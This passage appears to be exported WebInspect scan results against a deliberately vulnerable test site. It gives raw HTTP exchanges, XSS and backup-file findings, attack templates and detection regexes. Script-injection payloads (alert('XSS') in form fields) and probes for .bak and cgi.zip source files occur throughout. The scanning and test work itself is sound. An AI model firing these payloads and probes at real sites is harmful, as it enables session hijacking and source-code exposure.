IEVer = IEVer.substr( IEVer.indexOf('MSIE') + 5, 3 );
return (IEVer.charAt(1)=='.' && IEVer >= '5.5') ?
encodeURI(href) :
escape(href).replace(/%3A/g, ':').replace(/%3B/g, ';');
}
function InsertElementAnchor(href, text)
{
PrintTag('A', true, TagAttrib('HREF', URI(href)), text);
}
//-->
</script>
<body bgcolor="FFFFFF">
<table width="410" cellpadding="3" cellspacing="5">
<tr>
<td align="left" valign="middle" width="360">
<h1 style="COLOR:000000; FONT: 13pt/15pt verdana"><!--Problem-->The page cannot be displayed</h1>
</td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">There is a problem with the page you are trying to reach and it cannot be displayed.</font></td>
</tr>
<tr>
<td width="400" colspan="2">
<font style="COLOR:000000; FONT: 8pt/11pt verdana">
<hr color="#C0C0C0" noshade>
<p>Please try the following:</p>
<ul>
<li>Open the
<script>
<!--
if (!((window.navigator.userAgent.indexOf("MSIE") > 0) && (window.navigator.appVersion.charAt(0) == "2")))
{
Homepage();
}
//-->
</script>
home page, and then look for links to the information you want.</li>
<li>Click the <a href="javascript:location.reload()">
Refresh</a> button, or try again later.<br>
</li>
</ul>
<h2 style="font:8pt/11pt verdana; color:000000">HTTP 403.2 - Forbidden: Read Access Forbidden<br>
Internet Information Services</h2>
<hr color="#C0C0C0" noshade>
<p>Technical Information (for support personnel)</p>
<ul>
<p>
<li>Background:<br>
This error can be caused if there is no default page available and directory browsing has not been enabled for the directory, or if you are trying to display an HTML page that resides in a directory marked for Execute or Script permissions only.</p>
<p>
<li>More information:<br>
<a href="http://www.microsoft.com/ContentRedirect.asp?prd=iis&sbp=&pver=5.0&pid=&ID=403.2&cat=web&os=&over=&hrd=&Opt1=&Opt2=&Opt3=" target="_blank">Microsoft Support</a>
</li></p>
</ul>
</font></td>
</tr>
</table>
</body>
</html>
Existing filename found in commentsA URL or filename was found in the comments of the file and found to exist.Remove the comment.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/_private/
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; passes3=; passes2=; passes=; CustomCookie=WebInspect
GET /forgot2.asp?msg2=no&msg=1"style="background:url(javascript:alert('XSS'))"%20" HTTP/1.0
Referer: http://zero.webappsecurity.com:80/forgot1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:56:01 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 1865
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Forgotten Password</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>F O R G O T T E N P A S S W O R D</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<tr><td bgcolor=#c000ff><b><center>Forgotton Password</center></a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center">1"style="background:url(javascript:alert('XSS'))" "</td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#c000ff><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="login.asp">Login</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
<tr bgcolor=#003388><td align="center"><b><a href="join.asp">Join</a></b></td></tr>
<tr bgcolor=#003388><td align="center"> </td></tr>
</form>
</Table>
</table>
</body>
</html>
Possible Form Injection Cross-Site Scripting VulnerabilityCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This type of cross-site scripting attack takes place by using the least amount of non standard characters.<br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?msg2=no&msg=<attack>1"style="background:url(javascript:alert('XSS'))"%20"</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/forgot1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
"style="background:url\(javascript:alert\('XSS'\)\)GET /rootlogin.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "3cfb65c1a8dc11:8f6"
Content-Length: 1354
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
Backup File (Appended .bak)A backup file with the extension .bak was found on the server. Often, old files are renamed with such an extension to distinguish them from production files. However, the source code for old files that have been renamed in this manner and left in the webroot can often be retrieved.GET /rootlogin.asp<attack>.bak</attack> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
200 |Content-Type:\stext/plain |Content-Type:\sapplication/octet-stream GET /rootlogin.asp.bak HTTP/1.0
Referer: http://zero.webappsecurity.com:80/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:35:03 GMT
Content-Type: application/octet-stream
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:38:19 GMT
ETag: "3cfb65c1a8dc11:8f6"
Content-Length: 1354
<%
dim sName, sPassPhrase
sName=Request("txtName")
sPassPhrase=Request("txtPassPhrase")
%>
<html>
<body>
<%
if lcase(sName)="root" then
Response.Write "Hello " & sName & "<br>Welcome back"
elseif lcase(sName)="/etc/passwd" then
Response.Write "root:x:0:0::/root:/bin/sh"
Response.Write "dsmith:x:516:522::/home/dsmith:/bin/false"
Response.Write "etaylor:x:517:523::/home/etaylor:/bin/false"
Response.Write "scooby:x:518:524::/home/scooby-doo:/bin/false"
Response.Write "pshaggy:x:519:526::/home/pshaggy:/bin/false"
Response.Write "dtomson:x:520:527::/home/dtomson:/bin/false"
Response.Write "jsmith:x:521:528::/home/jsmith:/bin/false"
elseif lcase(sName)="/boot.ini" then
Response.Write "[boot loader]"
Response.Write "timeout=30"
Response.Write "default=multi(0)disk(0)rdisk(0)partition(3)\WINNT"
Response.Write "[operating systems]"
Response.Write "multi(0)disk(0)rdisk(0)partition(3)\WINNT=""Microsoft Windows 2000 Server"" /fastdetect"
Response.Write "multi(0)disk(0)rdisk(0)partition(2)\WINNT=""Microsoft Windows 2000 Professional"" /fastdetect"
elseif lcase(sName)="*" then
Response.Write "An error has occurred"
elseif lcase(sName)=";" then
Response.Write "NON-HTML ERROR"
else
Response.Write "Go away " & sName & "<br>I don't know you"
end if
%>
</body>
</html>
Application Error MessageA web application error message was found. An error message indicates that WebInspect has generated an unhandled exception in your web application code. Unhandled exceptions are circumstances in which the application has recieved user input that it did not expect and doesn't know how to deal with. In many cases, an attacker can leverage the conditions that cause these errors in order to gain unauthorized access to the system.GET <var name="path"/> <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/banklogin.asp?serviceName=FreebankCaastAccess&templateName=prod_sel.forte&source=Freebank&AD_REFERRING_URL=http://www.Freebank.com
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; CustomCookie=WebInspect
error\shas\soccurred Or DB4Web\sClient\s-\sModul Not Generated\sby\sjavadocGET /test/cgi.zip HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Date: Thu, 04 Dec 2003 16:48:16 GMT
Content-Type: application/x-zip-compressed
Accept-Ranges: bytes
Last-Modified: Mon, 16 Jul 2001 03:47:06 GMT
ETag: "de9269fba9dc11:8f6"
Content-Length: 54
<html> FAKE ZIP FILE THAT SHOULD NEVER SHOW UP </html>Backup File (cgi.zip)A compressed file of CGI scripts was found. This is usually due to an administrator or developer backing up all their scripts into a single backup file. This is extremely dangerous. By downloading this file, any attacker can retrieve the names and source of all the CGI scripts located on the web server.GET /test/<attack>cgi.zip</attack> <var name="protocol"/>
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
200 |Content-Type:\stext/htmlGET /join.asp?name=&email=&surname=--><script>alert('XSS')</script>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=&surname=<attack>--><script>alert('XSS')</script></attack>&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /join.asp?name=&email=--><script>alert('XSS')</script>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname HTTP/1.0
Referer: http://zero.webappsecurity.com:80/join1.asp
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:55:42 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 4006
Content-Type: text/html
Cache-control: private
Set-Cookie: passes3=; path=/
Set-Cookie: passes2=; path=/
Set-Cookie: passes=; path=/
<html>
<html>
<head>
<title>Join Us</title>
<STYLE>
<!--
td {font-size: 9pt; color: #FEFCE0; font-family: verdana, arial}
A:link {text-decoration: none; color: #FFFFFF;}
A:visited {text-decoration: none; color: #FEFCE0;}
A:active {text-decoration: none; color: #FFFFFF;}
A:hover {text-decoration: none; color:#CCFFFF;}
-->
</STYLE>
</HEAD>
<body bgcolor="#000066" bgproperties=fixed topmargin="0" leftmargin="0" marginheight="0" marginwidth="0">
<td valign="top" align="center">
<table width="100%" border="0" cellpadding="5" cellspacing="0" align="center">
<tr><td height="32" bgcolor="#c000ff"><center><b>J O I N</b></center></td></tr>
<tr><td>
<table cellpadding="0" cellspacing="2" border="0" width="400" align="center">
<tr><td> </td></tr>
<tr><td> </td></tr>
<FORM ACTION="join1.asp" METHOD="get" NAME="TheForm">
<center>
<tr><td bgcolor=#c000ff colspan='2'><b><center>Please+fill+in+your+name</center></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<TR><TD align="right" bgcolor=#003388><B>Name:</B> </TD><TD bgcolor=#003388><INPUT NAME="Name" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Surname:</B> </TD><TD bgcolor=#003388><INPUT NAME="Surname" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>E-mail Address:</B> </TD><TD bgcolor=#003388><INPUT NAME="email" TYPE="text" VALUE="--><script>alert('XSS')</script>"></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Confirm Password:</B> </TD><TD bgcolor=#003388><INPUT NAME="Confirm Password" TYPE="password" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>House Number:</B> </TD><TD bgcolor=#003388><INPUT NAME="house" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Street:</B> </TD><TD bgcolor=#003388><INPUT NAME="street" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Address Line 2:</B> </TD><TD bgcolor=#003388><INPUT NAME="Address2" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Town/City:</B> </TD><TD bgcolor=#003388><INPUT NAME="town" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Postcode:</B> </TD><TD bgcolor=#003388><INPUT NAME="Postcode" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Country:</B> </TD><TD bgcolor=#003388><INPUT NAME="Country" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Home Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="homephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<TR><TD align="right" bgcolor=#003388><B>Mobile Phone:</B> </TD><TD bgcolor=#003388><INPUT NAME="mobilephone" TYPE="text" VALUE=""></INPUT></TD><TD></TD></TR>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'><b><a href="javascript:document.forms[0].submit()">Join</a></b></td></tr>
<tr><td align="center" bgcolor=#003388 colspan='2'> </td></tr>
<tr><td align="center" bgcolor=#c000ff colspan='2'> </td></tr>
</center>
</Table>
</table>
</body>
</html>
Possible Comment Injection Cross-Site ScriptingCross-site scripting vulnerabilities occur when a web application uses client-supplied data in an HTTP response without first filtering out potentially malicious characters. This takes place due to the fact that some web applications embed user input in the HTML comments. <br><br>
To carry out a cross-site scripting attack, an attacker will create a URL that takes advantage of a cross-site scripting flaw. The attacker must then find some way of getting a victim to visit this URL. This can be done in many ways, ranging from getting it listed in a search engine to exploiting weaknesses in mail clients that allow scripted content to be executed. Once the victim has used the cross-site scripting URL, the attacker's malicious code will be executed on his or her system. The most common goal of these attacks is to capture the victim's cookie. A cookie is an authentication token that a webserver uses to determine the identity of a client. With a victim's cookie, an attacker can launch a session hijacking attack and gain access to the victim's account or other personal information on the webserver.<BR>
<BR>
To verify the issue:<BR>
Click on the 'HTTP Response' button and search for "alert('XSS')". If this is found, then the script is vulnerable to cross-site scripting.GET <var name="path"/>?name=&email=<attack>--><script>alert('XSS')</script></attack>&surname=&house=&street=&address2=&town=&postcode=&country=&homephone=&mobilephone=&msg=Please%2Bfill%2Bin%2Byour%2Bname <var name="protocol"/>
Referer: http://<var name="host"/>:<var name="port"/>/join1.asp
Connection: Close
Host: <var name="host"/>
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
--><script>alert\('XSS'\)<\/script>GET /testing/ HTTP/1.0
Connection: Close
Host: zero.webappsecurity.com
User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)
Pragma: no-cache
Cookie: ASPSESSIONIDCQADCBSB=NKAAPGKBBAJPBGDPFGEDPANA; Keyed=Var2=Second+Value&Var1=First+Value; Second=Oatmal+Chocolate; FirstCookie=Chocolate+Chip; CustomCookie=WebInspect
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Thu, 04 Dec 2003 16:26:04 GMT
X-Powered-By: ASP.NET
Connection: Keep-Alive
Content-Length: 74827
Content-Type: text/html
Cache-control: private
<HTML>
<HEAD>
<TITLE></TITLE>
</HEAD>
<BODY>
<!-- Hidden Reference comment: should find this file /test/hidden.txt -->
<P> The first section shows how a combo box can be used to product optional
pages<BR></P>
<FORM ACTION="pcomboindex.asp" METHOD="post">
<SELECT NAME="cboPage">
<OPTION SELECTED="SELECTED" VALUE="pc1">Show Page One</OPTION>
<OPTION VALUE="pc2">Show Page Two</OPTION>
<OPTION VALUE="pc3">Show page three</OPTION>
</SELECT><BR> <INPUT TYPE="submit" VALUE="Submit"> </FORM><BR> <HR>
<P><A HREF="plink.asp?a=b&c=12">Second section is link that passes
parameters to a sub page</A><BR> <BR> <A HREF="error.html">My ERROR</A> Third
example allows the user to input values and then shows them on the following
page</P> <BR> <HR>
<P>False Keyword that should not be flagged: root:x:0:0:/root:/bin/sh <BR>
False Keyword that should not be flagged: An error has occurred <BR> <BR> <BR>
<A HREF="adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged by
SmartChecker</A> <BR> <A HREF="/user/adcenter.cgi">Link to adcenter.cgi exploit
- Should not be flagged due to not having keyword present</A> <BR>
<A HREF="/test/adcenter.cgi">Link to adcenter.cgi exploit - Should be flagged
by Smartchecker(Note: No HTML present)</A> <BR> <A
HREF="/linking/index.htm">Several chained directories</A> <BR>
<A HREF="/cfmerror.html">Cold Fusion Error</A> <BR> <A
HREF="/admin/help.cgi">Help</A> <BR> <A HREF="/aspnet.aspx">ASP.NET file</A>
<A HREF="/my folder/bleh.html">space folder</A>
<A HREF='/myquote.asp?bleh=''>quote link</A>
